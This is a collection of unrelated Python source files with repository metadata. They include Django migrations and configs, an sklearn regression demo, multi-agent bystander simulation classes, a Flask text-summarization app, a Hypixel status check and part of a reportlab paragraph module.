path = 'd:\\xiti10001\\zujuan\\{0}\\{1}'.format(time.strftime('%Y%m%d',time.localtime(time.time())),self.file_name)
        if not os.path.exists(path):
            os.makedirs(path)
| [
"[email protected]"
] | |
0ac4cdf0dc4d0068c5d28f7e139bf35bbae92bca | c1ed1b90f7e914aee1a17cd9b5bb83cf288f7e85 | /usersAccount/apps.py | 7e257ce953933d0d4ded1fea4b4a19236a69a80c | [] | no_license | tanaychaulinsec/User-authentication | 87e111f3731b57f9057554a58781d1a1705e351c | 6652e72a5b639174cb20ccdae1c49883bdcc8514 | refs/heads/master | 2022-12-12T10:41:25.172936 | 2020-08-25T15:39:00 | 2020-08-25T15:39:00 | 289,565,247 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 99 | py | from django.apps import AppConfig
class UsersaccountConfig(AppConfig):
name = 'usersAccount'
| [
"[email protected]"
] | |
248ae932e96969c1f76bce884663f4cd1e7fdccd | 1238ad2367cbf51246ef21216f3f77398a963268 | /Machine-Learning/scikit-learn/senkei_sample_1.py | 7e4d9f5141874b128205167273934a3a25a2f113 | [] | no_license | shiro16/sunaba | 91c8fb58802993cf428bd2833c4417a234161e49 | 83d62c51a5c35d02cf93de38f6ebf4ab451816e0 | refs/heads/master | 2023-01-28T02:05:01.146155 | 2021-05-11T06:34:36 | 2021-05-11T06:34:36 | 84,282,959 | 0 | 0 | null | 2023-01-08T00:14:46 | 2017-03-08T05:42:13 | Python | UTF-8 | Python | false | false | 560 | py | import numpy as np
import matplotlib.pyplot as plt
from sklearn import linear_model, datasets
# Generate regression data with random noise
np.random.seed(0)
regdata = datasets.make_regression(100, 1, noise=20.0)
# Fit the model and display its parameters
lin = linear_model.LinearRegression()
lin.fit(regdata[0], regdata[1])
print("coef and intercept : ", lin.coef_, lin.intercept_)
print("score :", lin.score(regdata[0], regdata[1]))
# Plot
xr = [-2.5, 2.5]
plt.plot(xr, lin.coef_ * xr + lin.intercept_)
plt.scatter(regdata[0], regdata[1])
plt.show()
| [
"[email protected]"
] | |
c209bbaacb59462c92f86852c6966232dfbf4d38 | 2c3404d57a64e52bb860b59445e48a6cf4537bc6 | /backend/services/migrations/0003_auto_20210502_1837.py | d5b91cd5d6d2ba633c5270a8f3f6263dbe68ffd6 | [] | no_license | miyou995/octosite | 42ef627c0d8378b007d9bad1333768428cc6ec2e | 362f5013a48fb7cd54a4cae84aed58da8fbb4388 | refs/heads/master | 2023-07-07T10:21:52.985355 | 2021-08-05T07:36:04 | 2021-08-05T07:36:04 | 392,947,907 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,306 | py | # Generated by Django 3.0.7 on 2021-05-02 17:37
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('services', '0002_auto_20210502_1438'),
]
operations = [
migrations.CreateModel(
name='ServiceCategory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200, verbose_name='Nom Catégorie')),
('slug', models.SlugField(max_length=200, unique=True, verbose_name='Slug')),
('description', models.CharField(max_length=400)),
('icon_url', models.CharField(max_length=250)),
],
options={
'verbose_name': 'Catégorie',
'verbose_name_plural': 'Catégories',
'ordering': ('name',),
},
),
migrations.AlterField(
model_name='service',
name='category',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='services.ServiceCategory', verbose_name='Catégorie'),
),
migrations.DeleteModel(
name='Category',
),
]
| [
"[email protected]"
] | |
71c9b1d33046a6ad3c060c4f3e76ee5cf4280b26 | 36073b3c349eb6887a03b8f90b39ebd54fa3deb3 | /cadastros/urls.py | 225b7457bf5f7a4bb5dc7949f740bd6c6c5f567f | [] | no_license | evertonpauli/e-ticket | 6ba29a3d4a0b3dc2841a5db470e2c717315e8450 | 066cf48e70dec425aeaaa7aeefd617ffd1616307 | refs/heads/master | 2023-04-30T10:54:13.013547 | 2019-08-15T13:12:45 | 2019-08-15T13:12:45 | 202,204,800 | 0 | 0 | null | 2023-04-21T20:36:51 | 2019-08-13T18:42:22 | Python | UTF-8 | Python | false | false | 328 | py | from rest_framework import routers
from cadastros.views import ClientesViewSet, CategoriaViewSet, StatusViewSet
router = routers.DefaultRouter(trailing_slash=True)
router.register('clientes', ClientesViewSet)
router.register('categorias', CategoriaViewSet)
router.register('status', StatusViewSet)
urlpatterns = router.urls
| [
"[email protected]"
] | |
5f521276c2d1adbf2aab4331c07f24c57d0c44ad | 53a1e00175aad8bb9bc9d93c47a3e12eeffb7c67 | /account/migrations/0038_auto_20200917_0120.py | 607a62545d691cc8c088b0f011d46c375bd3a602 | [] | no_license | mirsisir/flash | c363d748725ebf4c5bbce9f03cbaafe32f768e9e | 42d73be32fd29ab4592ccaca3c03b786223fc902 | refs/heads/master | 2022-12-26T08:02:54.927235 | 2020-10-03T08:32:24 | 2020-10-03T08:32:24 | 300,835,641 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 353 | py | # Generated by Django 3.0.8 on 2020-09-17 01:20
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('account', '0037_auto_20200917_0100'),
]
operations = [
migrations.AlterModelOptions(
name='order',
options={'ordering': ('-order_date1',)},
),
]
| [
"[email protected]"
] | |
65757a625f7f8aafc159219b1ac837edf8deab90 | a251f675c1083e857d9f612a3bef9c6745d6b1b9 | /chapter12_async_IO_coroutine/yield_from_how.py | 45e7a864accdeeb55778cd38383ed8bfe7a2f6fa | [] | no_license | haokr/PythonProgramming_Advanced | 6319e5bb4a82944c11d83e1095e2aa37cb217bd9 | 472da8407828f53be3cc3d1153ac9b795f6a9a45 | refs/heads/master | 2022-04-01T22:02:10.364678 | 2020-02-09T08:07:55 | 2020-02-09T08:07:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,304 | py | # -*- coding: utf-8 -*-
'''
* @Author: WangHao
* @Date: 2020-01-12 09:47:40
* @LastEditors: WangHao
* @LastEditTime: 2020-01-12 10:07:08
* @Description: None
'''
'''
Summary:
1. Values produced by the subgenerator are passed straight through to the caller. Values the caller supplies via .send() go straight to the subgenerator: sending None invokes the subgenerator's __next__() method, anything else invokes its send() method.
2. When the subgenerator exits, its final `return EXPR` raises a StopIteration(EXPR) exception.
3. The value of the `yield from` expression is the first argument of the StopIteration raised when the subgenerator terminates.
4. If a StopIteration is raised during the call, the delegating generator resumes as well; any other exception bubbles up.
5. Of the exceptions thrown into the delegating generator, all except GeneratorExit are forwarded to the subgenerator's throw() method; if that call raises StopIteration, the delegating generator resumes, and any other exception bubbles up.
6. Calling close() on the delegating generator, or throwing GeneratorExit into it, calls the subgenerator's close() method if it has one; if that call raises an exception it bubbles up, otherwise the delegating generator raises GeneratorExit.
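
A minimal sketch (added for illustration) of points 1-3, using a toy subgenerator:

    def subgen():
        total = 0
        while True:
            x = yield
            if x is None:
                return total          # point 2: raises StopIteration(total)
            total += x

    def delegator():
        result = yield from subgen()  # point 3: result is StopIteration's value
        yield result

    g = delegator()
    next(g)              # prime; forwarded to subgen's __next__() (point 1)
    g.send(1)            # sent values pass straight through to the subgenerator
    g.send(2)
    print(g.send(None))  # subgen returns 3, so `yield from` evaluates to 3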
'''
| [
"[email protected]"
] | |
a43d5a84086bb4be7ba32c8067fcbd249315d7db | 929ce0470f5e9ce8ed7cabdfbcfa73c0b5b35d30 | /settings.py | 5d117541ecb60c1cac53f43154299046e18f055c | [] | no_license | milesgranger/cmdata | 2ee96706a61372c94955e0fd942e777149249e2c | 535b237af99d988e158ab8b5304d0d1340b7f908 | refs/heads/master | 2020-04-06T07:08:27.252382 | 2016-09-11T10:25:42 | 2016-09-11T10:25:42 | 65,610,733 | 0 | 1 | null | 2016-09-11T10:25:43 | 2016-08-13T09:44:49 | Python | UTF-8 | Python | false | false | 866 | py | import os
import logging
import json
from peewee import Model, SqliteDatabase
with open('settings.json', 'r') as myfile:
json_settings = json.loads(myfile.read())
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
SECRET_KEY = json_settings["SECRET_KEY"]
DEBUG = json_settings["DEBUG"]
#######################
### DATABASE CONFIG ###
#######################
DB_URI = json_settings['DATABASE']
DATABASE = SqliteDatabase(DB_URI, threadlocals=True)
class BaseModel(Model):
'''
Base class for all other DB Models
Basically defines which database to use
'''
class Meta:
database = DATABASE
#######################
### PATHS #############
#######################
ROOT_DIR = os.path.dirname(os.path.abspath(__file__))
STATIC_DIR = os.path.join(ROOT_DIR, 'static')
TEMPLATES_DIR = os.path.join(ROOT_DIR, 'templates')
| [
"[email protected]"
] | |
794f234132b9911b2627c4d8a81cf9092ef9550b | 7751c53180eb5eda2c9ff6f1406d755733d7a3a0 | /multiagent/agents/bystander.py | 4f63775706930f75b6101b4a5bb89072ffa5e9a0 | [
"MIT"
] | permissive | HassamSheikh/VIP_Protection_Envs | b2927de19565c6fb09d1db42105ea4defc7aa912 | ea8b4f702d037336812035abbf8aaa12e26f8c46 | refs/heads/master | 2020-07-14T01:32:15.620448 | 2019-08-29T18:03:45 | 2019-08-29T18:03:45 | 205,201,943 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,809 | py | import numpy as np
import copy  # needed by StreetBystander.vicsek_step's copy.deepcopy call below

from . import *
class Bystander(Participant):
""" A bystander (crowd participant) in the bodyguard environment, performing a movement that involves visiting random landmarks. If the bystander is near a bodyguard, it stops...
"""
def __init__(self, scenario):
super().__init__(scenario)
self.action_callback = self.theaction
self.color = np.array([0.8, 0.0, 0.0]) # red
self.state.p_pos = np.random.uniform(-1,+1, scenario.world.dim_p)
self.state.p_vel = np.zeros(scenario.world.dim_p)
self.goal_a = None
self.wait_count = 0
def reset(self):
super(Bystander, self).reset()
self.goal_a=None
def theaction(self, agent, world):
""" The behavior of the bystanders. Implemented as callback function
"""
# If the agent finds itself out of range, jump to a random new location
if self.out_of_bounds():
self.reset()
bystander_action = Action()
# The bystanders freeze if they are near a bodyguard or have no goal
if self.near_bodyguard(agent, world) or not self.goal_a:
bystander_action.u = np.zeros(world.dim_p)
self.wait_count += 1
if self.wait_count > 50:
agent.goal_a = self.nearest_landmark(world)
relative_position = (agent.goal_a.state.p_pos - agent.state.p_pos)
bystander_action.u = (relative_position/np.linalg.norm(relative_position))
self.wait_count = 0
return bystander_action
# If the agent reached its goal, picks a new goal randomly from the landmarks
if self.reached_goal():
agent.goal_a = np.random.choice(world.landmarks)
# otherwise, move towards the landmark
relative_position = (agent.goal_a.state.p_pos - agent.state.p_pos)
bystander_action.u = (relative_position/np.linalg.norm(relative_position)) * self.step_size
return bystander_action
def near_bodyguard(self, agent, world):
bodyguard_p_pos = np.asarray([bodyguard.state.p_pos for bodyguard in self.scenario.bodyguards])
distance_between_all_bodyguards = np.linalg.norm(bodyguard_p_pos-agent.state.p_pos, axis=1)
return np.any(0.3 > distance_between_all_bodyguards)
def nearest_landmark(self, world):
landmark_p_pos = np.array([landmark.state.p_pos for landmark in world.landmarks])
idx = np.linalg.norm(landmark_p_pos-self.state.p_pos, axis=1).argsort()[0]
return world.landmarks[idx]
class StreetBystander(Bystander):
""" A bystander (crowd participant) in the bodyguard environment, performing Vicsek Particle Motion. If the bystander is near a bodyguard, it stops...
"""
def __init__(self, scenario):
super().__init__(scenario)
self.action_callback = self.theaction
self.theta = np.random.uniform(-np.pi,np.pi)
self.noise = np.random.rand()
def reset(self):
""" Reset the states of an agent """
self.state.p_vel = np.random.uniform(-.5, .5, self.scenario.world.dim_p)
self.theta=np.random.uniform(-np.pi,np.pi)
def theaction(self, agent, world):
""" The behavior of the bystanders. Implemented as callback function
"""
#print("bystander action")
# If the agent finds itself out of range, jump to a random new location
bystander_action = Action()
#The bystanders freeze if they are near a bodyguard
if self.near_bodyguard(agent, world) or self.out_of_bounds():
bystander_action.u = np.array([-0.2, -0.2])
return bystander_action
# otherwise, move towards the landmark
relative_position= (self.vicsek_step() - agent.state.p_pos)
bystander_action.u = (relative_position/np.linalg.norm(relative_position))
return bystander_action
def near_bodyguard(self, agent, world):
bodyguard_p_pos = np.asarray([bodyguard.state.p_pos for bodyguard in self.scenario.bodyguards])
distance_between_all_bodyguards = np.linalg.norm(bodyguard_p_pos-agent.state.p_pos, axis=1)
return np.any(0.1 > distance_between_all_bodyguards)
def vicsek_step(self):
noise_increments = (self.noise - 0.5)
bystander_p_pos = np.asarray([bystander.state.p_pos for bystander in self.scenario.bystanders])
distance_between_all_crowd = np.linalg.norm(bystander_p_pos-self.state.p_pos, axis=1)
np.nan_to_num(distance_between_all_crowd, False)
near_range_bystanders = np.where((distance_between_all_crowd > 0) & (distance_between_all_crowd <=1.5))[0].tolist()
near_angles = [self.scenario.bystanders[idx].theta for idx in near_range_bystanders]
near_angles = np.array(near_angles)
mean_directions = np.arctan2(np.mean(np.sin(near_angles)), np.mean(np.cos(near_angles)))
self.theta = mean_directions + noise_increments
vel = np.multiply([np.cos(self.theta), np.sin(self.theta)], self.state.p_vel)
position = self.state.p_pos + (vel * 0.15)
if not ((-self.scenario.env_range <= position[0] <= self.scenario.env_range) and (-self.scenario.env_range <= position[1] <= self.scenario.env_range)):
return copy.deepcopy(self.state.p_pos + .1)
return np.clip(position, -1, 1)
class HostileBystander(Bystander):
"""A Hostile Bystander"""
def __init__(self, scenario):
super().__init__(scenario)
self.action_callback = None
#self.color = np.array([0.8, 0.0, 1.1])
def observation(self):
"""returns the observation of a hostile bystander"""
other_pos = []
other_vel = []
for other in self.scenario.world.agents:
if other is self: continue
other_pos.append(other.state.p_pos - self.state.p_pos)
other_vel.append(other.state.p_vel)
return np.concatenate([self.state.p_vel] + other_pos + other_vel)
def reward(self, world):
"""Reward for Hostile Bystander for being a threat to the VIP"""
vip_agent = self.scenario.vip_agent
rew = Threat(vip_agent, self.scenario.bodyguards, [self]).calculate_residual_threat_at_every_step()
bodyguards = self.scenario.bodyguards
for bodyguard in bodyguards:
rew += 0.1 * self.distance(bodyguard)
if self.is_collision(bodyguard):
rew -= 10
if self.is_collision(vip_agent):
rew += 10
def bound(x):
if x < 0.9:
return 0
if x < 1.0:
return (x - 0.9) * 10
return min(np.exp(2 * x - 2), 10)
for p in range(world.dim_p):
x = abs(self.state.p_pos[p])
rew -= bound(x)
return rew
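# Editor's sketch (illustrative, standalone -- not part of the original file):
# the classic batch form of the rule StreetBystander.vicsek_step applies per
# bystander: each particle adopts the mean heading of neighbours within radius
# r, plus uniform noise. Function name and constants here are made up.
def vicsek_headings(positions, headings, r=1.5, noise=0.5):
    distances = np.linalg.norm(positions[:, None, :] - positions[None, :, :], axis=-1)
    new_headings = np.empty_like(headings)
    for i in range(len(headings)):
        near = headings[distances[i] <= r]  # neighbourhood includes the particle itself
        mean_dir = np.arctan2(np.mean(np.sin(near)), np.mean(np.cos(near)))
        new_headings[i] = mean_dir + noise * (np.random.rand() - 0.5)
    return new_headings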
| [
"[email protected]"
] | |
d1878d336619c62c219f42222f728c8e4ed65c83 | 7d768b5be4213c3ac90648d48d1a322fb8c5c433 | /python_code/chuanzhi/python_advance/19/process_pool.py | e42b0da91f0fd4f73e665517b8f08d73f03c0eeb | [] | no_license | googleliyang/gitbook_cz_python | 7da5070b09e760d5e099aeae468c08e705b7da78 | c82b7d435dc11016e24cde2bdc4a558f507cb668 | refs/heads/master | 2020-04-02T17:47:58.400424 | 2018-12-22T09:48:59 | 2018-12-22T09:48:59 | 154,672,309 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 111 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @File : process_pool.py
# @Author: ly
# @Date : 2018/12/8
| [
"[email protected]"
] | |
83319329ae3deb480ae7390407f2049fa217f9a8 | 03d29ea4bc9a0e302d6000947b5d70b17ebfdec5 | /games/hipixel.py | 75a9f1a40f443db7829006ae08d5b8ccc5799813 | [] | no_license | Tim232/GameWatcherBot | 0abc05657b5768db18c78ecbe8c9bee89169145e | aa60c0997928ea26d63b770d1dd55b208529f80f | refs/heads/main | 2023-03-04T13:52:27.690345 | 2021-02-16T12:31:39 | 2021-02-16T12:31:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 584 | py | import requests
import json
import os
import sys
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
#import bot
key, player_uuid = '', ''
with open('../settings.json', 'r') as f:
hipixel_settings = json.load(f)["hipixel"]
key = hipixel_settings["key"]
player_uuid = hipixel_settings["player_uuid"]
url = 'https://api.hypixel.net/status?key=' + key + '&uuid=' + player_uuid
html = requests.get(url)
result = json.loads(html.text)
#bot.client.get_channel(channel_id)
if result['session']['online']: print('online')
else: print('offline')
| [
"[email protected]"
] | |
bf9f3b6aa1efcc20fe3d0f874b18a994c50a5c78 | 9c84d806af445c9998f3145f07efe5d30b91c815 | /users/migrations/0001_initial.py | f6e88219a642508d9b52bb956e3e985136460980 | [] | no_license | naman114/Django_Blog | c065e50b7e6184e69bc4e2ac19b36c98d6084aea | c97eb63fd4d67df4638ab5766ee76cd5e39023ea | refs/heads/master | 2023-04-18T03:15:47.368787 | 2021-05-04T00:36:02 | 2021-05-04T00:36:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 777 | py | # Generated by Django 3.1.7 on 2021-03-30 20:09
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Profile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('image', models.ImageField(default='default.jpg', upload_to='profile_pics')),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| [
"[email protected]"
] | |
56db26ac23eb5330f73c013d50f5c5683be26524 | ee3ededc11e224619506d39c95cd4c8a150b9ffc | /run/migrations/0022_auto_20210610_0543.py | c9d3e8ffae0d8ff5ddf7955fc8397c7651b14ea5 | [] | no_license | TwoPointFour/django-backend | 5b37b11c63c5f7b061d323af191dd7cc725c885c | fd41da863df4cf79e5c8f9af2b211d6628ab6651 | refs/heads/main | 2023-08-11T14:01:39.604186 | 2021-09-27T05:04:13 | 2021-09-27T05:04:13 | 377,231,515 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 626 | py | # Generated by Django 3.2.3 on 2021-06-09 21:43
from django.db import migrations, models
import run.models
class Migration(migrations.Migration):
dependencies = [
('run', '0021_alter_workoutlog_workouts'),
]
operations = [
migrations.AddField(
model_name='profile',
name='alias',
field=models.CharField(blank=True, max_length=50),
),
migrations.AlterField(
model_name='profile',
name='profileImage',
field=models.ImageField(default='default/default.jpg', upload_to=run.models.upload_to),
),
]
| [
"[email protected]"
] | |
c6eafbbe4676917c6f23a05bc73e21e549c0ba3f | 43842089122512e6b303ebd05fc00bb98066a5b2 | /dynamic_programming/120_triangle.py | 99985fab0c45baef506be9737699a9531b32e925 | [] | no_license | mistrydarshan99/Leetcode-3 | a40e14e62dd400ddb6fa824667533b5ee44d5f45 | bf98c8fa31043a45b3d21cfe78d4e08f9cac9de6 | refs/heads/master | 2022-04-16T11:26:56.028084 | 2020-02-28T23:04:06 | 2020-02-28T23:04:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,507 | py | """
Given a triangle, find the minimum path sum from top to bottom. Each step you may move to adjacent numbers on the row below.
For example, given the following triangle
[
[2],
[3,4],
[6,5,7],
[4,1,8,3]
]
The minimum path sum from top to bottom is 11 (i.e., 2 + 3 + 5 + 1 = 11).
"""
class Solution(object):
def minimumTotal_1(self, triangle):
"""
:type triangle: List[List[int]]
:rtype: int
"""
result = []
for line in range(1, len(triangle)):
result.append([0] * line)
result.append(triangle[-1])
for i in reversed(range(len(triangle))):
for j in range(i):
result[i - 1][j] = min(result[i][j], result[i][j+1]) + triangle[i - 1][j]
return result[0][0]
def minimumTotal_2(self, triangle):
# modify the triangle in place
if not triangle:
return
for i in range(len(triangle)-2, -1, -1):
for j in range(len(triangle[i])):
triangle[i][j] = min(triangle[i+1][j], triangle[i+1][j+1]) + triangle[i][j]
return triangle[0][0]
def minimumTotal_3(self, triangle):
# O(n) space
if not triangle:
return
result = triangle[-1]
for i in range(len(triangle) - 2, -1, -1):
for j in range(len(triangle[i])):
result[j] = min(result[j], result[j+1]) + triangle[i][j]
return result[0]
triangle_1 = [[2],[3,4],[6,5,7],[4,1,8,3]]
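# Quick check (added for illustration): all three variants return 11 for the
# example above. _2 and _3 mutate their argument, so pass deep copies.
import copy
s = Solution()
for f in (s.minimumTotal_1, s.minimumTotal_2, s.minimumTotal_3):
    print(f.__name__, f(copy.deepcopy(triangle_1)))  # -> 11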
| [
"[email protected]"
] | |
0acae82186a9621c166aec6bb0d254ebb92b1f81 | 818dae742767ca890779c208d0e71292c9c688c8 | /app.py | ee11cfae74e172e2a4288e1f931afd1cc7937f75 | [] | no_license | mnassrib/text-summarizer-app | f128eda50b2dfa620f6f6bba46942ecb487c5f2f | 3c97606497dc9e933ee0bb086a58be3cb4a678f1 | refs/heads/master | 2022-07-28T18:01:28.673292 | 2020-05-19T23:53:08 | 2020-05-19T23:53:08 | 265,273,408 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,995 | py | from __future__ import unicode_literals
from flask import Flask, render_template, url_for, request
from spacy_summarization import text_summarizer
from gensim.summarization import summarize
from nltk_summarization import nltk_summarizer
import time
import spacy
import en_core_web_sm
nlp = en_core_web_sm.load()
app = Flask(__name__)
# Web Scraping Pkg
from bs4 import BeautifulSoup
from urllib.request import urlopen
#from urllib import urlopen
# Sumy Pkg
from sumy.parsers.plaintext import PlaintextParser
from sumy.nlp.tokenizers import Tokenizer
from sumy.summarizers.lex_rank import LexRankSummarizer
# Sumy
def sumy_summary(docx):
parser = PlaintextParser.from_string(docx,Tokenizer("english"))
lex_summarizer = LexRankSummarizer()
summary = lex_summarizer(parser.document,3)
summary_list = [str(sentence) for sentence in summary]
result = ' '.join(summary_list)
return result
# Reading Time
def readingTime(mytext):
total_words = len([ token.text for token in nlp(mytext)])
estimatedTime = total_words/200.0
return estimatedTime
# Fetch Text From Url
def get_text(url):
page = urlopen(url)
    soup = BeautifulSoup(page, 'html.parser')  # explicit parser avoids bs4's "no parser specified" warning
fetched_text = ' '.join(map(lambda p:p.text,soup.find_all('p')))
return fetched_text
@app.route('/')
def index():
return render_template('index.html')
@app.route('/analyze', methods=['GET','POST'])
def analyze():
start = time.time()
if request.method == 'POST':
rawtext = request.form['rawtext']
final_reading_time = "{:.3f}".format(readingTime(rawtext))
final_summary = text_summarizer(rawtext)
summary_reading_time = "{:.3f}".format(readingTime(final_summary))
end = time.time()
final_time = "{:.3f}".format(end-start)
return render_template('index.html',ctext=rawtext,final_summary=final_summary,final_time=final_time,final_reading_time=final_reading_time,summary_reading_time=summary_reading_time)
@app.route('/analyze_url', methods=['GET','POST'])
def analyze_url():
start = time.time()
if request.method == 'POST':
raw_url = request.form['raw_url']
rawtext = get_text(raw_url)
final_reading_time = "{:.3f}".format(readingTime(rawtext))
final_summary = text_summarizer(rawtext)
summary_reading_time = "{:.3f}".format(readingTime(final_summary))
end = time.time()
final_time = "{:.3f}".format(end-start)
return render_template('index.html',ctext=rawtext,final_summary=final_summary,final_time=final_time,final_reading_time=final_reading_time,summary_reading_time=summary_reading_time)
@app.route('/compare_summary')
def compare_summary():
return render_template('compare_summary.html')
@app.route('/comparer', methods=['GET','POST'])
def comparer():
start = time.time()
if request.method == 'POST':
rawtext = request.form['rawtext']
final_reading_time = "{:.3f}".format(readingTime(rawtext))
final_summary_spacy = text_summarizer(rawtext)
summary_reading_time = "{:.3f}".format(readingTime(final_summary_spacy))
# Gensim Summarizer
final_summary_gensim = summarize(rawtext)
summary_reading_time_gensim = "{:.3f}".format(readingTime(final_summary_gensim))
# NLTK
final_summary_nltk = nltk_summarizer(rawtext)
summary_reading_time_nltk = "{:.3f}".format(readingTime(final_summary_nltk))
# Sumy
final_summary_sumy = sumy_summary(rawtext)
summary_reading_time_sumy = "{:.3f}".format(readingTime(final_summary_sumy))
end = time.time()
final_time = "{:.3f}".format(end-start)
return render_template('compare_summary.html',ctext=rawtext,final_summary_spacy=final_summary_spacy,final_summary_gensim=final_summary_gensim,final_summary_nltk=final_summary_nltk,final_time=final_time,final_reading_time=final_reading_time,summary_reading_time=summary_reading_time,summary_reading_time_gensim=summary_reading_time_gensim,final_summary_sumy=final_summary_sumy,summary_reading_time_sumy=summary_reading_time_sumy,summary_reading_time_nltk=summary_reading_time_nltk)
@app.route('/about')
def about():
return render_template('index.html')
if __name__ == '__main__':
app.run(debug=True) | [
"[email protected]"
] | |
81f5eb7112b4fddb2b1def7dd9e93b220c6f3982 | 06905fd703d600f95f7a21dfe8e102b26df05921 | /mmsite/wsgi.py | eeab6b532485c7681a3e40ee26925807b14b17ee | [] | no_license | NmrTannhauser/marketmaker | 5fa722962b7a3300967378970ddb9d572d254b38 | 87761de0187b1ae65236d7f968eaeb9a43f23c07 | refs/heads/master | 2020-03-14T16:35:28.388404 | 2018-05-28T16:14:41 | 2018-05-28T16:14:41 | 131,701,070 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 390 | py | """
WSGI config for mmsite project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "mmsite.settings")
application = get_wsgi_application()
| [
"[email protected]"
] | |
03ff755a26f0ca8650026e3ea508c2e1a76f5a1c | 73e4f50d2aabaf630e3a6154f3a149f6dee22656 | /apps/users/migrations/0003_auto_20170124_1008.py | 57a0420da15f1ec3aac5a6b35f833671e6d0a2c2 | [] | no_license | gjw199513/Mxonline | 508f8878eba396de1a88903c148a2f32641d9d8f | 360b759a0d21d712f3588c6fec377aabc2f990e0 | refs/heads/master | 2022-11-28T14:25:19.268436 | 2017-12-22T09:23:01 | 2017-12-22T09:23:31 | 80,403,072 | 4 | 2 | null | null | null | null | UTF-8 | Python | false | false | 491 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-01-24 10:08
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('users', '0002_auto_20170124_1007'),
]
operations = [
migrations.AlterField(
model_name='userprofile',
name='mobile',
field=models.CharField(blank=True, default=None, max_length=11, null=True),
),
]
| [
"gjw605134015"
] | gjw605134015 |
c58de3d099facdaa74fbc9362cf2b4d91bbdac3f | 297c6d7f0c15538349e2854c93a9b672836f433a | /routes/route4.py | 9db70781388939fe05282160420b8e727089cc97 | [] | no_license | Utklossning/ev3-robot | 5dec26e72b870589909acfe4a23862930b4a3112 | 1830c19e3406521f3384256137ec7c6e969ed3c0 | refs/heads/master | 2020-04-05T09:47:25.332861 | 2018-11-19T07:37:14 | 2018-11-19T07:37:14 | 156,774,626 | 0 | 0 | null | 2018-11-17T09:10:17 | 2018-11-08T22:01:21 | Python | UTF-8 | Python | false | false | 664 | py | import time
class Route():
def __init__(self, bot):
self.bot = bot
self.route_number = "four"
def start(self):
self.bot.move_forward(45, 50)
self.bot.rotate_right(45, 50)
self.bot.move_forward(44, 50)
self.bot.rotate_right(46, 50)
self.bot.move_forward(28, 50)
self.bot.detect_red_tape()
self.bot.empty_container()
self.bot.move_backward(35, 75)
self.bot.rotate_left(46, 50)
self.bot.move_backward(44, 75)
self.bot.rotate_left(37, 50)
self.bot.move_backward(57, 75)
return True
| [
"[email protected]"
] | |
7dd79a81c2691091fdf63dedb45319a7eae1a591 | 0fb12be061ab050904ceea99f6a938985a0d8acf | /report_mako2pdf/lib/xhtml2pdf/reportlab_paragraph.py | eba9e9aa506f6c2e6a82f44c220787a1075fbb14 | [] | no_license | libermatos/Openerp_6.1 | d17fbff1f35948e0c4176e2ed34ac5d7f8453834 | 510df13df7ea651c055b408ad66c580ca29d4ad7 | refs/heads/master | 2023-06-19T00:24:36.002581 | 2021-07-07T01:17:20 | 2021-07-07T01:17:20 | 383,574,889 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 71,161 | py | # -*- coding: utf-8 -*-
# Copyright ReportLab Europe Ltd. 2000-2008
# see license.txt for license details
# history http://www.reportlab.co.uk/cgi-bin/viewcvs.cgi/public/reportlab/trunk/reportlab/platypus/paragraph.py
# Modifications by Dirk Holtwick, 2008
from string import join, whitespace
from operator import truth
from reportlab.pdfbase.pdfmetrics import stringWidth, getAscentDescent
from reportlab.platypus.paraparser import ParaParser
from reportlab.platypus.flowables import Flowable
from reportlab.lib.colors import Color
from reportlab.lib.enums import TA_LEFT, TA_RIGHT, TA_CENTER, TA_JUSTIFY
from reportlab.lib.textsplit import ALL_CANNOT_START
from copy import deepcopy
from reportlab.lib.abag import ABag
import re
PARAGRAPH_DEBUG = False
LEADING_FACTOR = 1.0
_wsc_re_split = re.compile('[%s]+' % re.escape(''.join((
u'\u0009', # HORIZONTAL TABULATION
u'\u000A', # LINE FEED
u'\u000B', # VERTICAL TABULATION
u'\u000C', # FORM FEED
u'\u000D', # CARRIAGE RETURN
u'\u001C', # FILE SEPARATOR
u'\u001D', # GROUP SEPARATOR
u'\u001E', # RECORD SEPARATOR
u'\u001F', # UNIT SEPARATOR
u'\u0020', # SPACE
u'\u0085', # NEXT LINE
#u'\u00A0', # NO-BREAK SPACE
u'\u1680', # OGHAM SPACE MARK
u'\u2000', # EN QUAD
u'\u2001', # EM QUAD
u'\u2002', # EN SPACE
u'\u2003', # EM SPACE
u'\u2004', # THREE-PER-EM SPACE
u'\u2005', # FOUR-PER-EM SPACE
u'\u2006', # SIX-PER-EM SPACE
u'\u2007', # FIGURE SPACE
